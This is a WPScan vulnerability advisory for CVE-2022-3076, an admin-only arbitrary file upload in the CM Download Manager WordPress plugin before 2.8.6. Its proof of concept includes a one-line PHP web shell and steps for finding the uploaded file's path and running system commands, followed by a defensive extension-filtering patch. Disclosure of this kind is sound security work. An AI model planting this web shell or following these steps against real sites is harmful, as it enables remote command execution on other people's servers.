WPScan

WordPress Plugin Vulnerabilities

CM Download Manager < 2.8.6 - Admin+ Arbitrary File Upload

Description

The plugin allows high-privilege users such as admins to upload arbitrary files by adding any extension to the plugin's "Allowed file extensions" setting, which could be used by admins of a multisite blog to upload PHP files, for example.

Proof of Concept

##########################
Activate PHP extension:
##########################

- Log in and go to "CM Downloads" > "Settings" > "General".

- Now you can simply add the php extension to the "Allowed file extensions:" field, because the plugin does not check for the php extension.

##################################
Upload our malicious PHP file:
##################################

- Go to "CM Downloads" > "Add New".

- Upload our malicious file:

	For example: malicious_php.php
	<?=`$_GET[cmd]`?>

##########################
Find the right path:
##########################

There are two ways to find the path, because the upload code prefixes the sanitized name with a timestamp:

   $name = time() . '_' . sanitize_file_name($_download_file['name']);

But we don't need to write a script; we can find the path more easily:

- Go to "CM Downloads" > "CM Downloads".
- Click on "Edit" next to the name we gave to our download; we are redirected to the edit page.
- We need the id present in the URL, for example: http://target/cmdownload/edit/id/7/ => so here it's 7
- We can find the name of our malicious file below the "Browse" button: 1660921772_malicious_php.php
- So now we can execute system commands:

 => target/wp-content/uploads/cmdm/id/filename

 https://target/wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=command
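The missing check described above, as an added example that is not the plugin's own code: a server-side guard that strips executable extensions out of the "Allowed file extensions" setting when it is saved and re-checks every upload name, so an admin-editable setting can never re-enable PHP uploads. Function names are hypothetical and the extension list is an assumption that should match the web server's handler configuration.

```php
<?php
// Extensions a PHP-capable web server may execute (assumed list; align it
// with the server's handler configuration, e.g. what Apache maps to php-fpm).
const CMDM_EXEC_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phar', 'phps',
    'pht', 'shtml', 'htaccess',
];

/** Normalise one extension: lower-case, no surrounding whitespace, no leading dot. */
function cmdm_normalise_ext(string $ext): string {
    return strtolower(ltrim(trim($ext), '.'));
}

/**
 * Sanitise the comma/space separated setting value on save. Executable
 * extensions are dropped even if an admin typed them, which is the check
 * the vulnerable versions lack.
 */
function cmdm_sanitize_allowed_extensions(string $setting): array {
    $allowed = [];
    foreach (preg_split('/[\s,;]+/', $setting) as $raw) {
        $ext = cmdm_normalise_ext($raw);
        if ($ext === '' || in_array($ext, CMDM_EXEC_EXTENSIONS, true)) {
            continue;
        }
        $allowed[$ext] = true;
    }
    return array_keys($allowed);
}

/**
 * Decide whether an uploaded name may be stored. Every extension in the name
 * is checked (so "shell.php.pdf" is rejected, not just the last part), and
 * the executable list is consulted again so the setting alone cannot
 * override the guard.
 */
function cmdm_is_upload_allowed(string $filename, array $allowed): bool {
    $parts = explode('.', basename($filename));
    if (count($parts) < 2) {
        return false; // no extension at all: nothing to match against
    }
    array_shift($parts); // discard the base name, keep every extension
    foreach ($parts as $raw) {
        $ext = cmdm_normalise_ext($raw);
        if ($ext === '' || in_array($ext, CMDM_EXEC_EXTENSIONS, true)
            || !in_array($ext, $allowed, true)) {
            return false;
        }
    }
    return true;
}

// Usage with the setting from the PoC: "PHP" is dropped, the upload is refused.
$allowed = cmdm_sanitize_allowed_extensions('pdf, zip, PHP');
var_dump(cmdm_is_upload_allowed('1660921772_malicious_php.php', $allowed));
var_dump(cmdm_is_upload_allowed('report.pdf', $allowed));
```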

Affects Plugins

cm-download-manager
Fixed in version 2.8.6

References

CVE
CVE-2022-3076

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Mika

Submitter

Mika

Submitter website
https://mikadmin.fr/
Submitter twitter
mika_sec
Verified

Yes

WPVDB ID
d18e695b-4d6e-4ff6-a060-312594a0d2bd

Timeline

Publicly Published

2022-09-05

Added

2022-09-05

Last Updated

2022-09-05
